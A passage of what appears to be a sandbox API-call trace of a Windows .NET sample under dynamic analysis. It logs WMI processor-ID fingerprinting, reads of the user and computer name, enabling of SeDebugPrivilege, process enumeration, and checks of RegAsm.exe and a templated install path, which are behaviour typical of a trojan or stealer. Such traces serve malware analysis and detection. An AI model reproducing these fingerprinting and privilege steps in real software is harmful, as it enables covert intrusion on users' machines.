varVal1=0x2, varVal2=0x0), pType=0x1fe1ece8*=3, plFlavor=0x1fe1ece4*=64) returned 0x0 [0272.099] IWbemClassObject:Get (in: This=0x22625c48, wszName="__PATH", lFlags=0, pVal=0x1fe1ec14*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x1fe1eccc*=0, plFlavor=0x1fe1ecc8*=0 | out: pVal=0x1fe1ec14*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="\\\\XDUWTFONO\\root\\cimv2:Win32_Processor.DeviceID=\"CPU0\"", varVal2=0x0), pType=0x1fe1eccc*=8, plFlavor=0x1fe1ecc8*=64) returned 0x0 [0272.100] SysStringLen (param_1="\\\\XDUWTFONO\\root\\cimv2:Win32_Processor.DeviceID=\"CPU0\"") returned 0x36 [0272.101] CreateEventW (lpEventAttributes=0x0, bManualReset=0, bInitialState=0, lpName=0x0) returned 0x770 [0272.102] GetLastError () returned 0x0 [0272.102] SetEvent (hEvent=0x6f4) returned 1 [0272.105] GetLastError () returned 0x0 [0272.105] CoWaitForMultipleHandles (in: dwFlags=0x2, dwTimeout=0xffffffff, cHandles=0x1, pHandles=0x1fe1ec30*=0x770, lpdwindex=0x1fe1e9e8 | out: lpdwindex=0x1fe1e9e8) returned 0x0 [0272.159] CoGetContextToken (in: pToken=0x1fe1ea80 | out: pToken=0x1fe1ea80) returned 0x0 [0272.159] CoGetContextToken (in: pToken=0x1fe1ea40 | out: pToken=0x1fe1ea40) returned 0x0 [0272.159] WbemDefPath:IUnknown:AddRef (This=0x2261e1b8) returned 0x2 [0272.159] WbemDefPath:IUnknown:QueryInterface (in: This=0x2261e1b8, riid=0x1fe1eabc*(Data1=0x3bc15af2, Data2=0x736c, Data3=0x477e, Data4=([0]=0x9e, [1]=0x51, [2]=0x23, [3]=0x8a, [4]=0xf8, [5]=0x66, [6]=0x7d, [7]=0xcc)), ppvObject=0x1fe1eab8 | out: ppvObject=0x1fe1eab8*=0x2261e1b8) returned 0x0 [0272.161] WbemDefPath:IUnknown:Release (This=0x2261e1b8) returned 0x2 [0272.162] WbemDefPath:IUnknown:Release (This=0x2261e1b8) returned 0x1 [0272.162] CoGetContextToken (in: pToken=0x1fe1eb00 | out: pToken=0x1fe1eb00) returned 0x0 [0272.163] CoGetContextToken (in: pToken=0x1fe1eac0 | out: pToken=0x1fe1eac0) returned 0x0 [0272.163] WbemDefPath:IUnknown:AddRef (This=0x2261e1b8) returned 0x2 [0272.163] WbemDefPath:IUnknown:QueryInterface (in: This=0x2261e1b8, riid=0x1fe1eb3c*(Data1=0x3bc15af2, Data2=0x736c, Data3=0x477e, Data4=([0]=0x9e, [1]=0x51, [2]=0x23, [3]=0x8a, [4]=0xf8, [5]=0x66, [6]=0x7d, [7]=0xcc)), ppvObject=0x1fe1eb38 | out: ppvObject=0x1fe1eb38*=0x2261e1b8) returned 0x0 [0272.164] WbemDefPath:IUnknown:Release (This=0x2261e1b8) returned 0x2 [0272.165] WbemDefPath:IWbemPath:SetText (This=0x2261e1b8, uMode=0x4, pszPath="\\\\XDUWTFONO\\root\\cimv2:Win32_Processor.DeviceID=\"CPU0\"") returned 0x0 [0272.165] WbemDefPath:IUnknown:Release (This=0x2261e1b8) returned 0x1 [0272.167] CoGetContextToken (in: pToken=0x1fe1eaec | out: pToken=0x1fe1eaec) returned 0x0 [0272.167] CoGetContextToken (in: pToken=0x1fe1eaac | out: pToken=0x1fe1eaac) returned 0x0 [0272.167] WbemDefPath:IUnknown:AddRef (This=0x2261daa8) returned 0x3 [0272.168] WbemDefPath:IUnknown:QueryInterface (in: This=0x2261daa8, riid=0x1fe1eb28*(Data1=0x3bc15af2, Data2=0x736c, Data3=0x477e, Data4=([0]=0x9e, [1]=0x51, [2]=0x23, [3]=0x8a, [4]=0xf8, [5]=0x66, [6]=0x7d, [7]=0xcc)), ppvObject=0x1fe1eb24 | out: ppvObject=0x1fe1eb24*=0x2261daa8) returned 0x0 [0272.169] WbemDefPath:IUnknown:Release (This=0x2261daa8) returned 0x3 [0272.170] WbemDefPath:IWbemPath:GetNamespaceCount (in: This=0x2261daa8, puCount=0x1fe1eca0 | out: puCount=0x1fe1eca0*=0x2) returned 0x0 [0272.170] WbemDefPath:IUnknown:Release (This=0x2261daa8) returned 0x2 [0272.171] CoGetContextToken (in: pToken=0x1fe1eadc | out: pToken=0x1fe1eadc) returned 0x0 [0272.171] CoGetContextToken (in: pToken=0x1fe1ea9c | out: pToken=0x1fe1ea9c) returned 0x0 [0272.172] WbemDefPath:IUnknown:AddRef (This=0x2261daa8) returned 0x3 [0272.172] WbemDefPath:IUnknown:QueryInterface (in: This=0x2261daa8, riid=0x1fe1eb18*(Data1=0x3bc15af2, Data2=0x736c, Data3=0x477e, Data4=([0]=0x9e, [1]=0x51, [2]=0x23, [3]=0x8a, [4]=0xf8, [5]=0x66, [6]=0x7d, [7]=0xcc)), ppvObject=0x1fe1eb14 | out: ppvObject=0x1fe1eb14*=0x2261daa8) returned 0x0 [0272.173] WbemDefPath:IUnknown:Release (This=0x2261daa8) returned 0x3 [0272.174] WbemDefPath:IWbemPath:GetText (in: This=0x2261daa8, lFlags=4, puBuffLength=0x1fe1ec9c*=0x0, pszText=0x0 | out: puBuffLength=0x1fe1ec9c*=0xf, pszText=0x0) returned 0x0 [0272.174] WbemDefPath:IUnknown:Release (This=0x2261daa8) returned 0x2 [0272.175] CoGetContextToken (in: pToken=0x1fe1eadc | out: pToken=0x1fe1eadc) returned 0x0 [0272.175] CoGetContextToken (in: pToken=0x1fe1ea9c | out: pToken=0x1fe1ea9c) returned 0x0 [0272.175] WbemDefPath:IUnknown:AddRef (This=0x2261daa8) returned 0x3 [0272.176] WbemDefPath:IUnknown:QueryInterface (in: This=0x2261daa8, riid=0x1fe1eb18*(Data1=0x3bc15af2, Data2=0x736c, Data3=0x477e, Data4=([0]=0x9e, [1]=0x51, [2]=0x23, [3]=0x8a, [4]=0xf8, [5]=0x66, [6]=0x7d, [7]=0xcc)), ppvObject=0x1fe1eb14 | out: ppvObject=0x1fe1eb14*=0x2261daa8) returned 0x0 [0272.177] WbemDefPath:IUnknown:Release (This=0x2261daa8) returned 0x3 [0272.178] WbemDefPath:IWbemPath:GetText (in: This=0x2261daa8, lFlags=4, puBuffLength=0x1fe1ec9c*=0xf, pszText="00000000000000" | out: puBuffLength=0x1fe1ec9c*=0xf, pszText="\\\\.\\root\\cimv2") returned 0x0 [0272.178] WbemDefPath:IUnknown:Release (This=0x2261daa8) returned 0x2 [0272.179] CoGetContextToken (in: pToken=0x1fe1ead4 | out: pToken=0x1fe1ead4) returned 0x0 [0272.180] CoGetContextToken (in: pToken=0x1fe1ea94 | out: pToken=0x1fe1ea94) returned 0x0 [0272.180] WbemDefPath:IUnknown:AddRef (This=0x2261daa8) returned 0x3 [0272.180] WbemDefPath:IUnknown:QueryInterface (in: This=0x2261daa8, riid=0x1fe1eb10*(Data1=0x3bc15af2, Data2=0x736c, Data3=0x477e, Data4=([0]=0x9e, [1]=0x51, [2]=0x23, [3]=0x8a, [4]=0xf8, [5]=0x66, [6]=0x7d, [7]=0xcc)), ppvObject=0x1fe1eb0c | out: ppvObject=0x1fe1eb0c*=0x2261daa8) returned 0x0 [0272.182] WbemDefPath:IUnknown:Release (This=0x2261daa8) returned 0x3 [0272.183] WbemDefPath:IWbemPath:GetNamespaceCount (in: This=0x2261daa8, puCount=0x1fe1ec88 | out: puCount=0x1fe1ec88*=0x2) returned 0x0 [0272.183] WbemDefPath:IUnknown:Release (This=0x2261daa8) returned 0x2 [0272.183] CoGetContextToken (in: pToken=0x1fe1eac4 | out: pToken=0x1fe1eac4) returned 0x0 [0272.184] CoGetContextToken (in: pToken=0x1fe1ea84 | out: pToken=0x1fe1ea84) returned 0x0 [0272.184] WbemDefPath:IUnknown:AddRef (This=0x2261daa8) returned 0x3 [0272.185] WbemDefPath:IUnknown:QueryInterface (in: This=0x2261daa8, riid=0x1fe1eb00*(Data1=0x3bc15af2, Data2=0x736c, Data3=0x477e, Data4=([0]=0x9e, [1]=0x51, [2]=0x23, [3]=0x8a, [4]=0xf8, [5]=0x66, [6]=0x7d, [7]=0xcc)), ppvObject=0x1fe1eafc | out: ppvObject=0x1fe1eafc*=0x2261daa8) returned 0x0 [0272.186] WbemDefPath:IUnknown:Release (This=0x2261daa8) returned 0x3 [0272.187] WbemDefPath:IWbemPath:GetText (in: This=0x2261daa8, lFlags=4, puBuffLength=0x1fe1ec84*=0x0, pszText=0x0 | out: puBuffLength=0x1fe1ec84*=0xf, pszText=0x0) returned 0x0 [0272.187] WbemDefPath:IUnknown:Release (This=0x2261daa8) returned 0x2 [0272.188] CoGetContextToken (in: pToken=0x1fe1eac4 | out: pToken=0x1fe1eac4) returned 0x0 [0272.188] CoGetContextToken (in: pToken=0x1fe1ea84 | out: pToken=0x1fe1ea84) returned 0x0 [0272.188] WbemDefPath:IUnknown:AddRef (This=0x2261daa8) returned 0x3 [0272.189] WbemDefPath:IUnknown:QueryInterface (in: This=0x2261daa8, riid=0x1fe1eb00*(Data1=0x3bc15af2, Data2=0x736c, Data3=0x477e, Data4=([0]=0x9e, [1]=0x51, [2]=0x23, [3]=0x8a, [4]=0xf8, [5]=0x66, [6]=0x7d, [7]=0xcc)), ppvObject=0x1fe1eafc | out: ppvObject=0x1fe1eafc*=0x2261daa8) returned 0x0 [0272.190] WbemDefPath:IUnknown:Release (This=0x2261daa8) returned 0x3 [0272.191] WbemDefPath:IWbemPath:GetText (in: This=0x2261daa8, lFlags=4, puBuffLength=0x1fe1ec84*=0xf, pszText="00000000000000" | out: puBuffLength=0x1fe1ec84*=0xf, pszText="\\\\.\\root\\cimv2") returned 0x0 [0272.191] WbemDefPath:IUnknown:Release (This=0x2261daa8) returned 0x2 [0272.196] IWbemClassObject:Get (in: This=0x22625c48, wszName="processorID", lFlags=0, pVal=0x1fe1ec44*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x201bc904*=0, plFlavor=0x201bc908*=0 | out: pVal=0x1fe1ec44*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="0F8BFBFF00050654", varVal2=0x0), pType=0x201bc904*=8, plFlavor=0x201bc908*=0) returned 0x0 [0272.196] SysStringLen (param_1="0F8BFBFF00050654") returned 0x10 [0272.197] IWbemClassObject:Get (in: This=0x22625c48, wszName="processorID", lFlags=0, pVal=0x1fe1ec48*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x201bc904*=8, plFlavor=0x201bc908*=0 | out: pVal=0x1fe1ec48*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="0F8BFBFF00050654", varVal2=0x0), pType=0x201bc904*=8, plFlavor=0x201bc908*=0) returned 0x0 [0272.197] SysStringLen (param_1="0F8BFBFF00050654") returned 0x10 [0272.209] CoGetContextToken (in: pToken=0x1fe1ea1c | out: pToken=0x1fe1ea1c) returned 0x0 [0272.209] IUnknown:AddRef (This=0x22625c0c) returned 0x3 [0272.210] IEnumWbemClassObject:Next (in: This=0x22625c0c, lTimeout=-1, uCount=0x1, apObjects=0x1f818f50, puReturned=0x201bb958 | out: apObjects=0x1f818f50*=0x0, puReturned=0x201bb958*=0x0) returned 0x1 [0272.213] IUnknown:Release (This=0x22625c0c) returned 0x2 [0272.268] CoGetContextToken (in: pToken=0x1fe1eb70 | out: pToken=0x1fe1eb70) returned 0x0 [0272.268] WbemLocator:IUnknown:Release (This=0x1f83ea2c) returned 0x1 [0272.269] IUnknown:Release (This=0x22625c0c) returned 0x0 [0274.234] GetUserNameW (in: lpBuffer=0x1f818f38, pcbBuffer=0x201bd05c | out: lpBuffer="5p5NrGJn0jS HALPmcxz", pcbBuffer=0x201bd05c) returned 1 [0274.266] GetComputerNameW (in: lpBuffer=0x1f818f38, nSize=0x201bd2d0 | out: lpBuffer="XDUWTFONO", nSize=0x201bd2d0) returned 1 [0274.383] GetEnvironmentVariableW (in: lpName="%startupfolder%", lpBuffer=0x1f818f38, nSize=0x80 | out: lpBuffer="") returned 0x0 [0274.383] GetLastError () returned 0xcb [0297.528] GetCurrentProcessId () returned 0x7d8 [0298.238] LookupPrivilegeValueW (in: lpSystemName=0x0, lpName="SeDebugPrivilege", lpLuid=0x1fe1e540 | out: lpLuid=0x1fe1e540*(LowPart=0x14, HighPart=0)) returned 1 [0298.247] GetLastError () returned 0x0 [0298.341] GetCurrentProcess () returned 0xffffffff [0298.341] GetLastError () returned 0x0 [0298.431] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x20, TokenHandle=0x1fe1e53c | out: TokenHandle=0x1fe1e53c*=0x74c) returned 1 [0298.432] GetLastError () returned 0x0 [0298.506] AdjustTokenPrivileges (in: TokenHandle=0x74c, DisableAllPrivileges=0, NewState=0x201be374*(PrivilegesCount=0x1, Privileges=((Luid.LowPart=0x14, Luid.HighPart=0, Attributes=0x2))), BufferLength=0x0, PreviousState=0x0, ReturnLength=0x0 | out: PreviousState=0x0, ReturnLength=0x0) returned 1 [0298.507] GetLastError () returned 0x0 [0298.552] CloseHandle (hObject=0x74c) returned 1 [0298.552] GetLastError () returned 0x0 [0298.828] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x21177e00, Length=0x20000, ResultLength=0x1fe1eccc | out: SystemInformation=0x21177e00, ResultLength=0x1fe1eccc*=0xbcf0) returned 0x0 [0299.770] GetCurrentProcessId () returned 0x7d8 [0299.780] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x21197e20, Length=0x20000, ResultLength=0x1fe1eccc | out: SystemInformation=0x21197e20, ResultLength=0x1fe1eccc*=0xbcf0) returned 0x0 [0299.836] GetFullPathNameW (in: lpFileName="C:\\Windows\\Microsoft.NET\\Framework\\v2.0.50727\\RegAsm.exe", nBufferLength=0x105, lpBuffer=0x1fe1e840, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\Microsoft.NET\\Framework\\v2.0.50727\\RegAsm.exe", lpFilePart=0x0) returned 0x38 [0299.836] GetLastError () returned 0x0 [0300.082] GetFullPathNameW (in: lpFileName="\\%insfolder%\\%insname%", nBufferLength=0x105, lpBuffer=0x1fe1e874, lpFilePart=0x0 | out: lpBuffer="C:\\%insfolder%\\%insname%", lpFilePart=0x0) returned 0x18 [0300.082] GetLastError () returned 0x0 [0300.083] SetErrorMode (uMode=0x1) returned 0x8001 [0300.084] GetFileAttributesExW (in: lpFileName="C:\\%insfolder%\\%insname%" (normalized: "c:\\%insfolder%\\%insname%"), fInfoLevelId=0x0, lpFileInformation=0x1fe1ecf4 | out: lpFileInformation=0x1fe1ecf4*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0)) returned 0 [0300.084] GetLastError () returned 0x3 [0300.084] SetErrorMode (uMode=0x8001) returned 0x1 [0302.659] CoCreateGuid (in: pguid=0x1fe1ed48 | out: pguid=0x1fe1ed48*(Data1=0x28cc16c4, Data2=0x4797, Data3=0x4369, Data4=([0]=0x8a, [1]=0xc8, [2]=0x37, [3]=0x1e, [4]=0xcc, [5]=0xc8, [6]=0x5f, [7]=0xdd))) returned 0x0 Thread: id = 25 os_tid = 0xb68 Thread: id = 26 os_tid = 0x14c [0136.979] CoGetContextToken (in: pToken=0x222ff978 | out: pToken=0x222ff978) returned 0x0 [0136.979] CObjectContext::QueryInterface () returned 0x0 [0136.979] CObjectContext::GetCurrentThreadType () returned 0x0 [0136.979] Release () returned 0x0 [0136.980] CoInitializeEx (pvReserved=0x0, dwCoInit=0x0) returned 0x0 Thread: id = 27 os_tid = 0x83c Thread: id = 71 os_tid = 0x93c [0244.669] CoInitializeEx (pvReserved=0x0, dwCoInit=0x0) returned 0x0 [0249.868] IIDFromString (in: lpsz="{CF4CC405-E2C5-4DDD-B3CE-5E7582D8C9FA}", lpiid=0x2281edf4 | out: lpiid=0x2281edf4) returned 0x0 [0249.883] CoGetClassObject (in: rclsid=0x1f8421e4*(Data1=0xcf4cc405, Data2=0xe2c5, Data3=0x4ddd, Data4=([0]=0xb3, [1]=0xce, [2]=0x5e, [3]=0x75, [4]=0x82, [5]=0xd8, [6]=0xc9, [7]=0xfa)), dwClsContext=0x15, pvReserved=0x0, riid=0x7342a3b0*(Data1=0x1, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x2281ed5c | out: ppv=0x2281ed5c*=0x2261fd00) returned 0x0 [0249.884] WbemDefPath:IUnknown:QueryInterface (in: This=0x2261fd00, riid=0x73517ecc*(Data1=0xb196b28f, Data2=0xbab4, Data3=0x101a, Data4=([0]=0xb6, [1]=0x9c, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x34, [6]=0x1d, [7]=0x7)), ppvObject=0x2281eb8c | out: ppvObject=0x2281eb8c*=0x0) returned 0x80004002 [0249.885] WbemDefPath:IClassFactory:CreateInstance (in: This=0x2261fd00, pUnkOuter=0x0, riid=0x734a7714*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x2281ebc4 | out: ppvObject=0x2281ebc4*=0x2261fd10) returned 0x0 [0249.887] WbemDefPath:IUnknown:QueryInterface (in: This=0x2261fd10, riid=0x734a7714*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x2281e968 | out: ppvObject=0x2281e968*=0x2261fd10) returned 0x0 [0249.902] WbemDefPath:IUnknown:QueryInterface (in: This=0x2261fd10, riid=0x734c4204*(Data1=0xc3fcc19e, Data2=0xa970, Data3=0x11d2, Data4=([0]=0x8b, [1]=0x5a, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xb7, [6]=0xc9, [7]=0xc4)), ppvObject=0x2281e924 | out: ppvObject=0x2281e924*=0x0) returned 0x80004002 [0249.922] WbemDefPath:IUnknown:AddRef (This=0x2261fd10) returned 0x3 [0249.922] CoGetContextToken (in: pToken=0x2281e7b0 | out: pToken=0x2281e7b0) returned 0x0 [0249.930] CoGetObjectContext (in: riid=0x734a7714*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x1f810884 | out: ppv=0x1f810884*=0x742030) returned 0x0 [0249.938] WbemDefPath:IUnknown:QueryInterface (in: This=0x2261fd10, riid=0x733a23cc*(Data1=0x3, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x2281e798 | out: ppvObject=0x2281e798*=0x1f81d028) returned 0x0 [0249.939] WbemDefPath:IMarshal:GetUnmarshalClass (in: This=0x1f81d028, riid=0x734a7714*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), pv=0x0, dwDestContext=0x3, pvDestContext=0x0, mshlflags=0x0, pCid=0x2281e7a0 | out: pCid=0x2281e7a0*(Data1=0x33a, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46))) returned 0x0 [0249.939] WbemDefPath:IUnknown:Release (This=0x1f81d028) returned 0x3 [0249.947] CoGetContextToken (in: pToken=0x2281e7a8 | out: pToken=0x2281e7a8) returned 0x0 [0249.947] WbemDefPath:IUnknown:AddRef (This=0x2261fd10) returned 0x4 [0249.948] WbemDefPath:IUnknown:QueryInterface (in: This=0x2261fd10, riid=0x733f767c*(Data1=0x144, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x2281e81c | out: ppvObject=0x2281e81c*=0x0) returned 0x80004002 [0249.949] WbemDefPath:IUnknown:Release (This=0x2261fd10) returned 0x3 [0249.959] WbemDefPath:IUnknown:Release (This=0x2261fd10) returned 0x2 [0249.960] WbemDefPath:IUnknown:Release (This=0x2261fd00) returned 0x0 [0249.961] WbemDefPath:IUnknown:Release (This=0x2261fd10) returned 0x1 [0249.968] SetEvent (hEvent=0x6e4) returned 1 [0250.006] GetLastError () returned 0x0 [0250.155] CoGetClassObject (in: rclsid=0x1f8421e4*(Data1=0xcf4cc405, Data2=0xe2c5, Data3=0x4ddd, Data4=([0]=0xb3, [1]=0xce, [2]=0x5e, [3]=0x75, [4]=0x82, [5]=0xd8, [6]=0xc9, [7]=0xfa)), dwClsContext=0x15, pvReserved=0x0, riid=0x7342a3b0*(Data1=0x1, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x2281ed5c | out: ppv=0x2281ed5c*=0x2261fd00) returned 0x0 [0250.156] WbemDefPath:IUnknown:QueryInterface (in: This=0x2261fd00, riid=0x73517ecc*(Data1=0xb196b28f, Data2=0xbab4, Data3=0x101a, Data4=([0]=0xb6, [1]=0x9c, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x34, [6]=0x1d, [7]=0x7)), ppvObject=0x2281eb8c | out: ppvObject=0x2281eb8c*=0x0) returned 0x80004002 [0250.157] WbemDefPath:IClassFactory:CreateInstance (in: This=0x2261fd00, pUnkOuter=0x0, riid=0x734a7714*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x2281ebc4 | out: ppvObject=0x2281ebc4*=0x2261fda8) returned 0x0 [0250.159] WbemDefPath:IUnknown:QueryInterface (in: This=0x2261fda8, riid=0x734a7714*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x2281e968 | out: ppvObject=0x2281e968*=0x2261fda8) returned 0x0 [0250.168] WbemDefPath:IUnknown:QueryInterface (in: This=0x2261fda8, riid=0x734c4204*(Data1=0xc3fcc19e, Data2=0xa970, Data3=0x11d2, Data4=([0]=0x8b, [1]=0x5a, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xb7, [6]=0xc9, [7]=0xc4)), ppvObject=0x2281e924 | out: ppvObject=0x2281e924*=0x0) returned 0x80004002 [0250.193] WbemDefPath:IUnknown:AddRef (This=0x2261fda8) returned 0x3 [0250.194] CoGetContextToken (in: pToken=0x2281e7b0 | out: pToken=0x2281e7b0) returned 0x0 [0250.194] WbemDefPath:IUnknown:QueryInterface (in: This=0x2261fda8, riid=0x733a23cc*(Data1=0x3, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x2281e798 | out: ppvObject=0x2281e798*=0x1f81d108) returned 0x0 [0250.195] WbemDefPath:IMarshal:GetUnmarshalClass (in: This=0x1f81d108, riid=0x734a7714*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), pv=0x0, dwDestContext=0x3, pvDestContext=0x0, mshlflags=0x0, pCid=0x2281e7a0 | out: pCid=0x2281e7a0*(Data1=0x33a, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46))) returned 0x0 [0250.195] WbemDefPath:IUnknown:Release (This=0x1f81d108) returned 0x3 [0250.201] CoGetContextToken (in: pToken=0x2281e7a8 | out: pToken=0x2281e7a8) returned 0x0 [0250.201] WbemDefPath:IUnknown:AddRef (This=0x2261fda8) returned 0x4 [0250.202] WbemDefPath:IUnknown:QueryInterface (in: This=0x2261fda8, riid=0x733f767c*(Data1=0x144, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x2281e81c | out: ppvObject=0x2281e81c*=0x0) returned 0x80004002 [0250.203] WbemDefPath:IUnknown:Release (This=0x2261fda8) returned 0x3 [0250.212] WbemDefPath:IUnknown:Release (This=0x2261fda8) returned 0x2 [0250.213] WbemDefPath:IUnknown:Release (This=0x2261fd00) returned 0x0 [0250.214] WbemDefPath:IUnknown:Release (This=0x2261fda8) returned 0x1 [0250.215] SetEvent (hEvent=0x71c) returned 1 [0250.255] GetLastError () returned 0x36b7 [0251.273] CoGetClassObject (in: rclsid=0x1f8421e4*(Data1=0xcf4cc405, Data2=0xe2c5, Data3=0x4ddd, Data4=([0]=0xb3, [1]=0xce, [2]=0x5e, [3]=0x75, [4]=0x82, [5]=0xd8, [6]=0xc9, [7]=0xfa)), dwClsContext=0x15, pvReserved=0x0, riid=0x7342a3b0*(Data1=0x1, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x2281ed5c | out: ppv=0x2281ed5c*=0x22620fa0) returned 0x0 [0251.274] WbemDefPath:IUnknown:QueryInterface (in: This=0x22620fa0, riid=0x73517ecc*(Data1=0xb196b28f, Data2=0xbab4, Data3=0x101a, Data4=([0]=0xb6, [1]=0x9c, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x34, [6]=0x1d, [7]=0x7)), ppvObject=0x2281eb8c | out: ppvObject=0x2281eb8c*=0x0) returned 0x80004002 [0251.275] WbemDefPath:IClassFactory:CreateInstance (in: This=0x22620fa0, pUnkOuter=0x0, riid=0x734a7714*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x2281ebc4 | out: ppvObject=0x2281ebc4*=0x2261daa8) returned 0x0 [0251.276] WbemDefPath:IUnknown:QueryInterface (in: This=0x2261daa8, riid=0x734a7714*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x2281e968 | out: ppvObject=0x2281e968*=0x2261daa8) returned 0x0 [0251.285] WbemDefPath:IUnknown:QueryInterface (in: This=0x2261daa8, riid=0x734c4204*(Data1=0xc3fcc19e, Data2=0xa970, Data3=0x11d2, Data4=([0]=0x8b, [1]=0x5a, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xb7, [6]=0xc9, [7]=0xc4)), ppvObject=0x2281e924 | out: ppvObject=0x2281e924*=0x0) returned 0x80004002 [0251.300] WbemDefPath:IUnknown:AddRef (This=0x2261daa8) returned 0x3 [0251.301] CoGetContextToken (in: pToken=0x2281e7b0 | out: pToken=0x2281e7b0) returned 0x0 [0251.301] WbemDefPath:IUnknown:QueryInterface (in: This=0x2261daa8, riid=0x733a23cc*(Data1=0x3, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x2281e798 | out: ppvObject=0x2281e798*=0x1f81d0d8) returned 0x0 [0251.303] WbemDefPath:IMarshal:GetUnmarshalClass (in: This=0x1f81d0d8, riid=0x734a7714*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), pv=0x0, dwDestContext=0x3, pvDestContext=0x0, mshlflags=0x0, pCid=0x2281e7a0 | out: pCid=0x2281e7a0*(Data1=0x33a, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46))) returned 0x0 [0251.303] WbemDefPath:IUnknown:Release (This=0x1f81d0d8) returned 0x3 [0251.309] CoGetContextToken (in: pToken=0x2281e7a8 | out: pToken=0x2281e7a8) returned 0x0 [0251.309] WbemDefPath:IUnknown:AddRef (This=0x2261daa8) returned 0x4 [0251.310] WbemDefPath:IUnknown:QueryInterface (in: This=0x2261daa8, riid=0x733f767c*(Data1=0x144, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x2281e81c | out: ppvObject=0x2281e81c*=0x0) returned 0x80004002 [0251.311] WbemDefPath:IUnknown:Release (This=0x2261daa8) returned 0x3 